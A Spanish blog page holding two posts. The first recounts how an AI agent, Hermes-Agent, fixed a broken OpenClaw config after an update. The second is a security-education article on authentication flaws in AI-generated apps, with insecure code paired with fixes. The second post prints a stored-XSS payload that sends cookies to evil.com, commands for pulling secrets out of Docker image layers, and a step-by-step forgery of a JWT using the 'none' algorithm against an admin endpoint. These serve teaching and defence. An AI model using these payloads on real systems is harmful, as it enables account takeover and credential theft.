Cuando los Agentes Arreglan a los Agentes: Cómo Hermes Reparó OpenClaw Tras una Mala Actualización

Tiempo de lectura: 7 minutos

TL;DR

Le pedí a OpenClaw que se actualizara solo. Lo hizo. Después, el gateway se negó a arrancar porque un campo de configuración había cambiado de forma silenciosa entre versiones (channels.discord.streaming pasó de ser una cadena a ser un objeto). openclaw doctor --fix detectó el problema, pero no fue capaz de arreglarlo. El AI Overview de Google sugirió con total seguridad lo contrario de la solución correcta. Hermes-Agent, con acceso a shell y al sistema de ficheros, leyó la configuración rota, hizo el único cambio necesario, guardó una copia de seguridad del original, reinició el servicio y verificó que todo iba bien, todo a partir de un prompt de un único párrafo. Trece minutos desde el primer aviso en rojo hasta el verde. Esto es lo que realmente significa «agentic ops».


Llevo bastante tiempo ejecutando OpenClaw en una Raspberry Pi 5. Es ese tipo de montaje que afinas los fines de semana y olvidas durante la semana, hasta que llega una actualización y algo se rompe sin avisar.

Esta mañana fue una de esas mañanas. Lo que quiero dejar por escrito no es solo el bug, sino la forma del arreglo. La herramienta de reparación de OpenClaw no fue lo que devolvió el gateway a la vida. Tampoco lo fue el AI Overview que aparece en la parte superior de cada resultado de Google. Lo que funcionó fue un agente de propósito general con acceso a shell y a ficheros, y la costumbre de leer una configuración antes de tener una opinión sobre ella.

Esa distinción parece pequeña. No lo es.


Paso 1: Le Pedí a AgentX que se Actualizara

Toda la historia empieza con una instrucción perfectamente razonable. Abrí la interfaz de chat de OpenClaw, saludé a AgentX (mi agente principal de OpenClaw) y le pedí que se actualizara.

1

update yourself please. El tipo de frase que le dices a un agente autónomo dando por hecho que sabrá apañárselas.

Y la parte de la actualización la gestionó. Lo que no gestionó fue la parte de validación posterior a la actualización, porque eso todavía no es algo que OpenClaw haga por sí mismo. La nueva versión introducía un cambio de esquema en uno de los campos de configuración. La actualización escribió los nuevos binarios. El fichero de configuración mantuvo su forma antigua. El siguiente arranque del gateway iba a fallar.

Yo todavía no sabía nada de esto.


Paso 2: Media Hora Después, el Gateway se Niega a Arrancar

Misma sesión, misma mañana. La actualización terminó en silencio en segundo plano. Cuando fui a levantar el gateway — openclaw gateway, esperando un arranque normal —, esto fue lo que obtuve:

2

Invalid config at /home/vulnex/.openclaw/openclaw.json:
channels.discord.streaming: invalid config: must be object
Run "openclaw doctor --fix" to repair, then retry.

Útil, en teoría. El arranque deja escrito un stability bundle (bien — para eso están los stability bundles) y el servicio se cae justo después.


Paso 3: El Status Confirma el Estado Roto

Lancé openclaw gateway status para ver el cuadro completo.

3

Una línea roja de lado a lado. state failed, sub failed, last exit 1, reason 1. La URL del dashboard ahí, burlándose de mí, la sonda de loopback sin poder conectar, y el gateway sin intención de volver por su cuenta.

En un mundo normal, este es el momento en el que sigues la solución sugerida por OpenClaw y terminas en cinco minutos. Eso fue lo primero que probé.


Paso 4: doctor --fix — La Auto-Reparación Que No Fue (Parte 1)

openclaw doctor --fix se supone que es el botón de «¿has probado a apagarlo y volverlo a encender?». Así que lo ejecuté.

4

El doctor se dedicó a sermonearme sobre NODE_COMPILE_CACHE y OPENCLAW_NO_RESPAWN en hosts de poca potencia. Consejos útiles. No el problema.


Paso 5: doctor --fix — La Auto-Reparación Que No Fue (Parte 2)

El doctor recorrió las secciones de config y gateway y acabó donde yo había empezado:

5

Restarted systemd service: openclaw-gateway.service
Error: Config validation failed: channels.discord.streaming: invalid config: must be object

El doctor reinició el servicio, pero nunca llegó a tocar la clave problemática. Lo cual tiene sentido, visto en frío. El validador dice «must be object», pero el doctor no tiene ninguna opinión sobre qué forma concreta debería tener ese objeto. No está en el negocio de adivinar esquemas nuevos. Es una postura razonable. Tampoco es muy útil a las 10:27 de la mañana.

Una cosa que OpenClaw debería cambiar: doctor --fix no debería imprimir «Restarted systemd service» una línea por encima de «Error: Config validation failed» y salir tan contento. A mí me confundió, y va a confundir a más gente. Lo abriré como bug.


Paso 6: La Respuesta Equivocada del AI Overview

Llegado este punto hice lo que haría la mayoría de la gente: pegué el mensaje de error exacto en Google a ver si alguien más se había topado con esto entre versiones.

6

Me decía que el validador quiere una cadena como "partial" y que mi configuración tenía un objeto, cuando en realidad el nuevo OpenClaw espera un objeto y mi configuración antigua tenía una cadena. Incluso me ofrecía un bloque JSON limpio, con resaltado de sintaxis, listo para copiar y pegar directamente en el fichero para romperlo más, etiquetado con un pin de citación de GitHub que daba toda la confianza del mundo.

Si hubiera ido con prisa, lo habría pegado. Esa es la parte que las demos de «IA para ops» suelen pasar por alto sin hacer ruido. La respuesta era fluida, estaba bien formateada, hasta llevaba cita, y apuntaba justo en sentido contrario a la dirección real de la migración del esquema.

Es el mismo modelo de amenaza que cubrí en Professional Vibe Coding vs. Vibe Coding, trasladado de un contexto de código a uno de operaciones. Si tu IA no puede leer el validador ni la configuración, te va a dar una respuesta segura sintetizada a partir del texto del error, y a veces esa respuesta es justo la contraria a la correcta.


Paso 7: Entra Hermes

Tengo Hermes-Agent enganchado a esta máquina precisamente para este tipo de líos. Trae herramientas de fichero, ejecución de shell, y la paciencia de leer las cosas en lugar de adivinarlas.

7

El stack de skills aquí importa: file:patch, read_file, search_files, write_file, code_execution, además del skill openclaw-agent-integrations que mantengo en local justo para este tipo de fontanería. Nada glamuroso, solo los movimientos básicos que hacen falta para arreglar un servicio mal configurado.

Le di un brief de un párrafo:

«I told openclaw to update itself and did, however the latest version breaks due a openclaw config json file error. The folder path is /home/vulnex/.openclaw. Make a copy of the config json file and fix the issue. You can use openclaw command to see the issue.»

Eso es todo. Sin esquema, sin pistas, sin ejemplo del nuevo formato.


Paso 8: Hermes se Orienta

Hermes hizo lo que yo habría hecho si hubiera dispuesto de otra hora.

8

  • Inspeccionó el entorno
  • Encontró la manera de invocar openclaw (el binario está en mi PATH, pero la shell no interactiva de Hermes no lo heredó, así que tiró de npx --yes openclaw y lo dejó claro en su resumen)
  • Leyó la configuración rota
  • Recuperó el stability bundle que el gateway había dejado caer al desplomarse

Nada de una única llamada dramática al LLM. Una pila de pasos pequeños y verificables: find, command -v, head, npm prefix -g, un heredoc de python3 que recorre $PATH buscando cualquier cosa que contenga claw. Aburrido a propósito.


Paso 9: Hermes Diagnostica

Una vez que tenía la configuración y el stability bundle en contexto, Hermes los comparó y averiguó qué había cambiado exactamente entre versiones.

9

Nada de adivinar a partir del texto del error. Lectura del original.


Paso 10: El Arreglo Aterriza

Hermes no tuvo el problema que tuvo el AI Overview, porque Hermes estaba leyendo los ficheros reales en lugar de inferir desde la prosa del error.

10

El diff es la historia completa:

// antes — forma antigua, válida en 2026.5.18 y anteriores
"channels": {
  "discord": {
    "streaming": "off"
  }
}

// después — forma nueva, requerida en 2026.5.19
"channels": {
  "discord": {
    "streaming": { "mode": "off" }
  }
}

OpenClaw 2026.5.19 promovió channels.discord.streaming de cadena a objeto etiquetado. El doctor vio que algo estaba mal, pero no tenía opinión sobre la nueva forma. El AI Overview de Google sí tenía opinión, y era la contraria a la correcta. Hermes:

  1. Leyó la configuración rota y el stability bundle startup_failed.json del gateway
  2. Hizo el cambio mínimo posible
  3. Escribió ~/.openclaw/openclaw.json.agenth-bak-20260521-103255 junto al original
  4. Reinició el servicio del gateway
  5. Verificó que el JSON parsea bien y que el error anterior había desaparecido

También fue honesto con sus propias matizaciones:

  • Usó npx --yes openclaw porque su shell no interactiva no heredó mi PATH interactivo — aunque el binario openclaw está, de hecho, instalado globalmente en este host. Una pequeña lectura errónea del entorno, pero transparente.
  • openclaw doctor seguía reportando avisos no relacionados, pero el problema de arranque que rompía la configuración estaba resuelto.

Esa auto-declaración importa, incluso cuando (como en el caso del PATH) el agente es algo demasiado pesimista sobre su entorno. Es mucho más fácil confiar en un agente que pone sus supuestos encima de la mesa que en uno que los esconde.


Paso 11: Verificación Desde el Shell

Confía, pero verifica. Vuelta al comando original que arrancó toda esta historia.

11

Runtime: running (pid 10178, state active, sub running, last exit 0, reason 0)
Connectivity probe: ok

Mismo comando, resultado opuesto. Once minutos antes esto había sido un muro rojo.


Paso 12: Pedirle a AgentX que lo Confirme

Después volví a la interfaz de chat de OpenClaw, el mismo sitio donde había empezado toda la historia, y se lo pregunté directamente a AgentX. Porque si no puedes fiarte de que el agente te cuente su propio estado tras una recuperación, tienes otros problemas.

12

«All good — gateway is running on 2026.5.19, active since 10:33. The doctor --fix restart attempt errored but the service came up fine on its own. We’re fully updated and online.»

Trece minutos desde el primer aviso en rojo hasta tenerlo en verde. La mayor parte de ese tiempo me lo pasé leyendo yo.

La sesión de chat hace de marco para toda la historia. Se abre con «update yourself please» y se cierra con «fully updated and online». Entremedias, un agente completamente distinto tuvo que entrar a hacer el trabajo real. Ese hueco es de lo que va este artículo.


Qué Nos Dice Realmente Este Episodio

La versión bonita de la historia es «agente que se rompe a sí mismo, agente que se arregla a sí mismo». Lo interesante está en el medio.

La herramienta de reparación del propio fabricante no arregló el producto del propio fabricante

openclaw doctor --fix es una buena idea ejecutada a medias. O entiende los caminos de migración de esquemas entre versiones recientes, o deja de fingir que ha hecho una reparación cuando la siguiente línea de su propio output dice que la configuración sigue sin validar. Ahora mismo hace lo peor posible: canta victoria y te deja roto. Eso es un bug de OpenClaw, no de la IA, y lo voy a reportar.

Los AI Overviews para usuario final se equivocan con seguridad en preguntas de esquema

Esto no es un caso aislado. El AI Overview no puede leer tu configuración, no puede leer el código del validador, no puede decirte hacia dónde ha migrado un esquema entre dos versiones, y formatea la respuesta equivocada con la misma seguridad que la correcta.

Para alguien que solo intenta levantar el gateway antes de una reunión, esa respuesta es peor que ninguna respuesta. Ninguna respuesta te manda a la documentación. Una respuesta equivocada con aire de seguridad te manda a pegar JSON roto en un fichero que estaba bien.

Tampoco es un problema específico de Google. Es el patrón general de producir una respuesta fluida a partir del síntoma en lugar de la fuente. Cualquier IA desplegada sin acceso de lectura al artefacto real se va a chocar con el mismo muro.

El agente que sí funcionó no era magia

Hermes no resolvió esto por ser más grande, más inteligente o estar entrenado con algo exótico. Lo resolvió porque podía leer el fichero, ejecutar un comando, escribir el fichero, y guardar una copia de seguridad. Esos cuatro movimientos son el suelo de lo que yo llamaría agentic ops, y la mayoría de la IA para usuario final sigue claramente por debajo de ese suelo.

La regla que me llevo de esta mañana es corta: si la IA en la que estás a punto de confiar para tocar una configuración no puede leer el fichero ni guardar una copia, no es una herramienta de ops. Es un buscador con mejor gramática.


Qué Voy a Cambiar en Mi Setup Después de Esto

Algunas cosas que voy a montar este fin de semana.

Quiero que ~/.openclaw/openclaw.json quede capturado en un repo git local antes de cada openclaw update. Los ficheros .agenth-bak de Hermes están bien para un incidente puntual, pero un historial real con control de versiones es mejor cuando llegue el próximo cambio de esquema.

También voy a dejar de tratar doctor --fix como una recuperación de un solo paso. Es un diagnóstico que de vez en cuando además escribe un arreglo. La auténtica verificación tiene que ser volver a lanzar openclaw gateway status y leer la salida.

Hermes se queda enganchado a esta máquina con scopes de fichero y ejecución pre-aprobados. La gracia del montaje es que cuando algo se rompe a las 10:25, no estoy también a las 10:26 cableando permisos de herramientas.

Y los nombres de los backups necesitan trabajo. openclaw.json.agenth-bak-20260521-103255 es razonable, pero quiero que esos ficheros caigan en ~/.openclaw/backups/ en lugar de quedarse al lado de la configuración viva.

Si estás ejecutando OpenClaw, la Guía Sencilla de Hardening de Seguridad para OpenClaw que escribí esta primavera sigue siendo la línea base correcta. Nada en el incidente de esta mañana cambia esas recomendaciones. Solo refuerza por qué una IA de solo lectura, que no puede tocar el artefacto, no debería estar en ningún punto cercano a tu bucle de recuperación.


Notas del Setup

Para quien quiera reproducir o comparar:

  • OpenClaw 2026.5.19 sobre un host Linux de clase Raspberry
  • Gateway en el puerto 18789, controlado desde la interfaz web de OpenClaw
  • Hermes-Agent v0.12.0 sobre el backend gpt-5.5 con 272K de contexto, configurado contra mi stack de skills estándar
  • El ~/.openclaw/openclaw.json original conservado como openclaw.json.agenth-bak-20260521-103255 para comparación forense

Una línea de JSON, y un recordatorio: la IA en la que confías durante un incidente tiene que poder leer el fichero.

Mantente paranoico. Lee la fuente. Guarda el backup.

Lecturas Recomendadas:

¿Preguntas o feedback? Contáctame a través de:

¿Necesitas ayuda para fortificar tu despliegue de agentes de IA? VULNEX ofrece:

  • Auditorías de seguridad de agentes IA (auditoría de skills, pruebas de prompt injection, revisión de configuración)
  • Engagements de red team (simulaciones de ataque potenciadas por IA)
  • Consultoría de automatización de seguridad y agentic ops
  • Desarrollo a medida de herramientas de seguridad

Contacto: info@vulnex.com

Publicado en AI, IA, Tecnologia | Etiquetado , , , , , | Deja un comentario

Autenticación y Secretos: Lo que la IA Siempre Hace Mal (Parte 5)

Serie Vibe Coding Security

  1. ¿Qué es Vibe Coding Security? Guía de Campo para 2026
  2. El OWASP Top 10 para Aplicaciones Vibe-Coded
  3. Anatomía de una Brecha de Vibe Coding: Lecciones de los Peores Incidentes de 2026
  4. La Trampa de las Dependencias: Riesgos en la Cadena de Suministro del Código Generado por IA
  5. Autenticación y Secretos: Lo que la IA Siempre Hace Mal (estás aquí)
  6. [Escaneando Aplicaciones Vibe-Coded: Por Qué el SAST/DAST Tradicional Se Queda Corto] (https://simonroses.com/es/2026/05/escaneando-aplicaciones-vibe-coded-por-que-el-sast-dast-tradicional-se-queda-corto-parte-6/)
  7. Prompt Engineering para Código Seguro
  8. El Checklist de Seguridad del Fundador
  9. Asegurando el Pipeline de Codificación IA
  10. El Futuro de Vibe Coding Security (próximamente)

Tiempo de lectura: 22 minutos

TL;DR

La autenticación y la gestión de secretos es donde el código generado por IA falla de forma más consistente y más peligrosa. En 67 líneas de una app de demostración que construí para una conferencia de seguridad, la IA produjo secretos JWT hardcodeados, hashing de contraseñas con MD5, tokens que nunca expiran, vulnerabilidades XSS y cero limitación de tasa — todo en una aplicación funcional que parece completamente normal para una persona sin conocimientos de seguridad. GitGuardian encontró 29 millones de secretos hardcodeados en GitHub en 2025, un salto del 34% interanual, con commits asistidos por IA filtrando secretos a más del doble de tasa que el código escrito por humanos. La auditoría de Inigra en el primer trimestre de 2026 sobre más de 200 aplicaciones vibe-coded encontró que el 91,5% contenía al menos una vulnerabilidad de seguridad trazable a código generado por IA. Y cuando Lovable — una de las mayores plataformas de vibe coding — fue golpeada por una vulnerabilidad BOLA en abril de 2026, cinco llamadas API desde una cuenta gratuita bastaron para acceder al código fuente, credenciales de base de datos y datos de clientes de cualquier otro usuario. Este artículo disecciona los cuatro patrones que la IA falla sistemáticamente — secretos hardcodeados, autenticación del lado del cliente, gestión de JWT rota y controles de acceso ausentes — y termina con un checklist de 20 puntos que puedes ejecutar contra tu aplicación ahora mismo.


Por Qué la Autenticación Es Donde Se Rompe Todo

Puedes publicar una app vibe-coded con un bug de CSS y nadie sale perjudicado. Publícala con un flujo de autenticación roto, y todo lo que hay detrás del login queda expuesto. La autenticación no es una funcionalidad más — es la frontera entre «mis datos» y «los datos de todo el mundo.» Y es lo que peor manejan las herramientas de codificación con IA.

Todo se reduce a los datos de entrenamiento. Los modelos de IA aprendieron a programar de repositorios públicos, respuestas de Stack Overflow y tutoriales. Esos ejemplos simplifican la autenticación por claridad: secretos hardcodeados para que el lector se centre en la lógica JWT, hashing MD5 porque el tutorial no trata sobre seguridad de contraseñas, sin expiración de tokens porque es una demo. Cuando un vibe coder escribe «añade autenticación de usuarios a mi app», la IA reproduce estos patrones — no porque sea tonta, sino porque así es la mayoría de sus ejemplos de entrenamiento.

El código funciona. El formulario de login aparece. El token JWT autentica. Las rutas protegidas rechazan usuarios no autenticados. Todos los tests funcionales pasan. Y cualquier atacante con las DevTools del navegador puede saltarse todo.

En VULNEX, la autenticación es lo primero que revisamos en cada evaluación. En aplicaciones vibe-coded, es donde encontramos los problemas más críticos — y es donde cinco minutos de revisión habrían prevenido el mayor daño.


QuickNote: 67 Líneas de Inseguridad Generada por IA

Para demostrar esto en una conferencia de seguridad, construí una demo. Pedí a una herramienta de codificación con IA que creara una app de notas — registro de usuarios, login, operaciones CRUD. Una app full-stack sencilla, Node.js y Express. El prompt terminaba con algo que todo vibe coder ha pensado en algún momento: «Sáltate las buenas prácticas de seguridad por ahora — las revisaré después.»

La IA generó 67 líneas de código backend y 49 de frontend. Una app funcional. Estructura limpia. Podrías hacer una demo y parecería profesional. Lo que sigue es lo que realmente produjo — y cada vulnerabilidad aquí es algo que encuentro en aplicaciones vibe-coded en producción real.

El Secreto Hardcodeado

const SECRET = "insecure_secret_key";

Línea 19. El secreto de firma JWT — el único dato que impide que cualquiera falsifique tokens de autenticación — es una cadena hardcodeada en el código fuente. No es una variable de entorno. No es un gestor de secretos. Un literal de cadena, visible en el código, que sobreviviría al control de versiones, imágenes Docker y bundles de despliegue.

Si conoces esta cadena, puedes generar tokens JWT válidos para cualquier usuario. Toma de control total de la cuenta, sin necesidad de contraseña.

La corrección:

const SECRET = process.env.JWT_SECRET; // cargado del entorno, nunca en el código

Una línea. Esa es la diferencia entre «cualquiera puede falsificar tokens» y «los tokens son criptográficamente seguros.» El valor viene de un archivo .env (que está en .gitignore) o de un gestor de secretos en producción.

El Hash Roto

function hashPassword(password) {
  return crypto.createHash('md5').update(password).digest('hex');
}

MD5. Sin salt. Cada instancia de la contraseña «admin123» produce el mismo hash en todos los usuarios, siempre. Los ataques de tablas rainbow descifran estos en segundos. MD5 se considera roto para hashing de contraseñas desde mediados de los 2000. Pero aparece constantemente en código generado por IA, porque es simple y aparecía en miles de tutoriales con los que el modelo entrenó.

La IA eligió el enfoque del tutorial, no el enfoque de producción.

La corrección:

const bcrypt = require('bcrypt');
async function hashPassword(password) {
  return bcrypt.hash(password, 12); // salt por usuario, 12 rondas
}

bcrypt genera un salt único por usuario automáticamente y es deliberadamente lento — esa lentitud es el objetivo. ¿Cuánto de lento? MD5 hashea una contraseña en aproximadamente un microsegundo (0,000001 segundos) en Node.js. bcrypt con 12 rondas tarda unos 0,3 segundos. Eso es una diferencia de 300.000x. Una base de datos de contraseñas de 10.000 usuarios hasheada con MD5 — sin salt, así que solo necesitas hashear cada contraseña candidata una vez — se puede crackear completamente contra el diccionario rockyou.txt (14,3 millones de entradas) en menos de un minuto. La misma base de datos con bcrypt? Cada usuario tiene un salt único, así que tienes que rehashear los 14,3 millones de candidatos por usuario. En una CPU de 10 núcleos, eso son aproximadamente 136 años. Los equipos de cracking con GPU reducen esto significativamente — pero incluso un clúster de GPUs de gama alta lo baja a años, no a minutos. Esas son las matemáticas detrás de «usa bcrypt.»

El Token Inmortal

const token = jwt.sign({ id: user.id, username: user.username }, SECRET);

Sin expiración. Este JWT es válido para siempre. Una vez emitido, nunca necesita ser renovado. Si es interceptado, robado o filtrado, proporciona acceso permanente a la cuenta. Sin parámetro expiresIn. Sin mecanismo de refresh token. Sin forma de invalidar una sesión comprometida.

La corrección:

const token = jwt.sign(
  { id: user.id, username: user.username },
  process.env.JWT_SECRET,
  { expiresIn: '1h' }  // el token muere en una hora
);

Un objeto de opciones. Eso es lo que separa «acceso permanente si es robado» de «ventana de una hora.»

El Punto de Inyección XSS

notes.innerHTML = data.map(n => `
<li>${n.content}</li>`).join('');

En el frontend, el contenido de las notas se inyecta directamente en el DOM vía innerHTML sin ninguna sanitización. Almacena <script>document.location='https://evil.com/steal?cookie='+document.cookie</script> como nota, y cada vez que la página renderiza, el script se ejecuta. En un contexto multiusuario, esto es XSS almacenado — la variante más peligrosa.

La corrección:

notes.textContent = ''; // limpia de forma segura
data.forEach(n => {
  const li = document.createElement('li');
  li.textContent = n.content; // textContent escapa HTML automáticamente
  notes.appendChild(li);
});

textContent en vez de innerHTML. El navegador trata el contenido como texto, no como marcado ejecutable. Sin necesidad de biblioteca de sanitización.

Lo que Falta

Más allá de lo que hay en el código, fíjate en lo que no hay: sin limitación de tasa en el login, sin forzar HTTPS, sin configuración CORS, sin validación de entrada en el endpoint de registro, sin requisitos de complejidad de contraseña, sin bloqueo de cuenta, sin registro de eventos de autenticación.

La ausencia de limitación de tasa merece números. Sin ella, un atacante puede enviar peticiones de login tan rápido como el servidor responda — fácilmente más de 100 por segundo contra una app Express típica. El diccionario rockyou.txt contiene 14,3 millones de contraseñas. A 100 peticiones/segundo, eso son 39 horas para probar absolutamente todas. Pero la mayoría de usuarios eligen contraseñas comunes: las 1.000 contraseñas más frecuentes cubren aproximadamente el 14% de todas las cuentas. A 100 peticiones/segundo, esos 1.000 intentos tardan diez segundos. Diez segundos para comprometer una de cada siete cuentas — porque la IA no añadió express-rate-limit, un middleware de cinco líneas.

Cada uno de estos es una vulnerabilidad. La IA los produjo todos en 67 líneas. Y la app funciona — que es exactamente la razón por la que nadie los detecta hasta que es demasiado tarde.


Patrón 1: Secretos Hardcodeados — El Problema a Escala

El const SECRET = "insecure_secret_key" de QuickNote es una línea en una demo. El problema es que este patrón exacto se repite en millones de repositorios.

Los Números

El informe State of Secrets Sprawl 2026 de GitGuardian encontró 29 millones de secretos hardcodeados en GitHub en 2025 — un aumento interanual del 34% y el mayor salto en un solo año que han registrado. Las credenciales de servicios de IA específicamente aumentaron un 81%, con 1,27 millones de tokens relacionados con IA expuestos.

La conexión con el vibe coding es directa: GitGuardian midió que los commits asistidos por Claude Code filtraban secretos en un 3,2% frente al 1,5% del baseline en todos los commits públicos — más del doble de tasa. La IA no distingue entre «este es un valor que debería externalizar» y «este es un valor que el código necesita.» Pone la clave API donde el código funciona, que es inline.

Tu .env Tampoco Es Seguro

Pensarías que la solución es sencilla — pon los secretos en .env y mantenlos fuera del código. Pero la investigación de Knostic demostró que herramientas como Cursor y Copilot leen activamente archivos .env durante la construcción de contexto, exponiendo efectivamente secretos a la API cloud del modelo. El secreto que cuidadosamente pusiste en una variable de entorno se incorpora a la ventana de contexto de la IA, y puede acabar reproducido en código generado en otra parte.

Así que la IA lee tus secretos del .env, y luego los hardcodea en el siguiente archivo que genera. El patrón se retroalimenta.

Va a peor en el despliegue. Las herramientas de IA generan frecuentemente Dockerfiles que copian todo el directorio del proyecto en la imagen, incluyendo .env:

COPY . /app          # copia todo, incluyendo .env
RUN npm install

Aunque después borres .env dentro del contenedor, las imágenes Docker funcionan por capas. El archivo persiste en la capa anterior. Cualquiera que descargue la imagen puede extraerlo:

docker history --no-trunc 
<imagen>
docker save 
<imagen> | tar -xf - -C /tmp/layers
# buscar secretos en las capas
grep -r "API_KEY\|SECRET\|DATABASE_URL" /tmp/layers/

La solución es un archivo .dockerignore que excluya .env, node_modules y cualquier otro archivo sensible — y pasar los secretos en tiempo de ejecución vía Docker secrets o inyección de variables de entorno. Pero los Dockerfiles generados por IA casi nunca incluyen un .dockerignore. Optimizan para «el build funciona», no para «el build es seguro.»

Consecuencias Reales

En marzo de 2026, un desarrollador recibió una factura de 82.314 dólares después de que una clave API de Google embebida en el JavaScript frontend de su web fuese robada. La clave se creó originalmente para Google Maps — bajo riesgo, pública por diseño. Pero cuando Google lanzó Gemini, las claves de Maps existentes ganaron acceso silenciosamente a los endpoints de Gemini. Los atacantes encontraron la clave expuesta, automatizaron peticiones contra Gemini Pro, y acumularon 82.000 dólares en 48 horas. El gasto mensual normal del desarrollador era de 180 dólares. Este es exactamente el patrón que las apps vibe-coded reproducen a escala: claves API embebidas en JavaScript del lado del cliente, visibles para cualquiera que abra el código fuente de la página.

Y los secretos filtrados no se limpian. GitGuardian encontró que el 64% de los secretos detectados en 2022 seguían válidos y sin revocar en 2026. Cuando una IA pone una clave en tu bundle de frontend y ese bundle se despliega en un CDN, la clave es pública para siempre — a menos que la revoques y rotes, cosa que la mayoría de equipos no hace.

Qué Comprobar

Ejecuta Gitleaks o TruffleHog contra tu código ahora mismo. Busca cadenas hardcodeadas que parezcan claves API, cadenas de conexión a base de datos o secretos JWT. Revisa tu bundle de frontend — cualquier cosa en JavaScript del lado del cliente es pública. Si encuentras secretos, revócalos inmediatamente, rota a nuevas credenciales, y muévelos a variables de entorno o un gestor de secretos.


Patrón 2: Autenticación del Lado del Cliente — La Puerta Sin Cerrojo

El Patrón

Este es el patrón Enrichlead de la Parte 3 a escala industrial. Las herramientas de codificación con IA colocan consistentemente las comprobaciones de autenticación y autorización en código frontend donde son trivialmente evitables. El paywall es un render condicional en React. El panel de administración está oculto por una clase CSS. El endpoint de API existe y funciona — el frontend simplemente no muestra el botón a usuarios no autenticados.

Los Datos

La investigación de Wiz sobre aplicaciones vibe-coded identificó cuatro patrones sistemáticos de misconfiguración, y la autenticación del lado del cliente encabezó la lista. Sus hallazgos: las herramientas de IA generan lógica de autenticación que optimiza para la experiencia de usuario — mostrando y ocultando elementos de UI — sin implementar la verificación correspondiente en el servidor. El resultado son aplicaciones donde cada funcionalidad protegida está a un comando curl de ser accedida por cualquiera.

La auditoría Q1 2026 de Inigra de más de 200 aplicaciones vibe-coded encontró que el 91,5% contenía al menos una vulnerabilidad de seguridad trazable a código generado por IA, con más del 60% exponiendo credenciales hardcodeadas. La plataforma Lovable — una de las herramientas de vibe coding más populares, valorada en 6.600 millones de dólares con ocho millones de usuarios — estuvo en el centro de múltiples incidentes de seguridad a principios de 2026, con investigadores descubriendo que más de 170 apps construidas en la plataforma tenían tablas de Supabase consultables por cualquiera que tuviese la clave pública anon.

Una parte significativa de estas involucraba misconfiguraciones de Supabase. Así es como se ve el código típico generado por IA para Supabase:

-- Lo que la IA genera (MAL):
CREATE TABLE notes (
  id SERIAL PRIMARY KEY,
  user_id UUID REFERENCES auth.users,
  content TEXT
);
-- Sin política RLS. Cualquier usuario autenticado puede leer/escribir todas las filas.
-- Con la clave anon, incluso usuarios no autenticados pueden acceder a la tabla.
-- Lo que debería generar:
CREATE TABLE notes (
  id SERIAL PRIMARY KEY,
  user_id UUID REFERENCES auth.users,
  content TEXT
);
ALTER TABLE notes ENABLE ROW LEVEL SECURITY;

CREATE POLICY "Los usuarios solo pueden acceder a sus propias notas"
  ON notes FOR ALL
  USING (auth.uid() = user_id)
  WITH CHECK (auth.uid() = user_id);

Cuatro líneas de SQL. Esa es la diferencia entre «cualquiera puede leer tu base de datos» y «los usuarios solo ven sus propias filas.» La IA omite ENABLE ROW LEVEL SECURITY y la política porque no las necesita para que el código funcione. La clave anon de Supabase, que está diseñada para ser pública, a menudo se confunde con la clave service_role, que absolutamente no debe ser pública. La IA no distingue la diferencia. Usa la clave que hace que el código funcione.

Por Qué la IA Hace Esto

La IA optimiza para lo que pediste. «Añade autenticación a mi app» significa «muestra una pantalla de login y protege las rutas.» La IA entrega exactamente eso — en el frontend. No añade espontáneamente middleware del lado del servidor, porque no pediste middleware. No implementa RBAC, porque pediste autenticación, no autorización. Produce la implementación mínima viable de lo que describiste, y en ese contexto, «autenticación» se reduce a una comprobación del lado del cliente.

Esta es la superficie de decisión invisible de la Guía de Campo. La IA decidió dónde poner la comprobación de autenticación, decidió no añadir validación del lado del servidor, decidió usar la clave anon en vez de implementar políticas RLS adecuadas. El desarrollador nunca vio ninguna de esas decisiones. La app funcionaba, así que pasó a lo siguiente.

Qué Comprobar

Abre la pestaña de red de tu navegador. ¿Puedes hacer peticiones API directamente, saltándote el frontend? Si tu API devuelve datos sin validar una sesión o token del lado del servidor, tu autenticación es solo del lado del cliente. Prueba cada endpoint — no solo los que la UI expone. Intenta acceder a endpoints de admin como usuario regular. Intenta acceder a datos de otros usuarios modificando IDs en las peticiones. Si algo de esto funciona, tienes un problema de autenticación del lado del cliente.


Patrón 3: JWT y Gestión de Sesiones Rotos

Los Fallos Estándar

JWT es el mecanismo de autenticación por defecto del código generado por IA. La IA recurre a él porque es stateless, está bien documentado y aparece en miles de ejemplos de entrenamiento. Pero las implementaciones están consistentemente rotas de las mismas formas:

Sin expiración. El ejemplo de QuickNote no establece parámetro expiresIn. El token es válido para siempre. Veo esto en aproximadamente la mitad de las aplicaciones vibe-coded que reviso — la IA genera la llamada jwt.sign() y no añade la opción de expiración porque el tutorial del que aprendió no la incluía.

Secretos de firma débiles o hardcodeados. «secret», «my_jwt_secret», «insecure_secret_key» — estos aparecen literalmente en aplicaciones en producción. La IA los toma de sus datos de entrenamiento, donde eran valores de marcador de posición en la documentación. Un secreto de firma débil significa que cualquiera puede falsificar tokens.

El algoritmo «none». JWT soporta un algoritmo llamado none que produce tokens sin firma — diseñado para entornos de desarrollo donde la verificación de firma añade sobrecarga. Las herramientas de IA ocasionalmente generan implementaciones JWT que aceptan el algoritmo none, o que lo incluyen en un array de algoritmos permitidos. Así es como funciona el ataque en la práctica:

# Paso 1: Tomar un JWT legítimo y dividirlo en sus tres partes (header.payload.signature)
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJ1c2VyIn0.signature_here"

# Paso 2: Crear una nueva cabecera con alg establecido a "none"
echo -n '{"alg":"none","typ":"JWT"}' | base64 -w 0 | tr -d '=' | tr '/+' '_-'
# Output: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0

# Paso 3: Modificar el payload (p.ej., cambiar el ID de usuario al del admin)
echo -n '{"id":1,"username":"admin"}' | base64 -w 0 | tr -d '=' | tr '/+' '_-'
# Output: eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiJ9

# Paso 4: Concatenar con una firma vacía
FORGED="eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiJ9."

# Paso 5: Usarlo
curl -H "Authorization: Bearer $FORGED" https://target.com/api/admin/users

Cinco comandos. Sin necesidad de secreto. Si el servidor lo acepta, tienes acceso total de admin. La corrección es especificar siempre el algoritmo permitido explícitamente en la llamada de verificación — jwt.verify(token, secret, { algorithms: ['HS256'] }) — para que el servidor rechace cualquier token que afirme usar un algoritmo diferente.

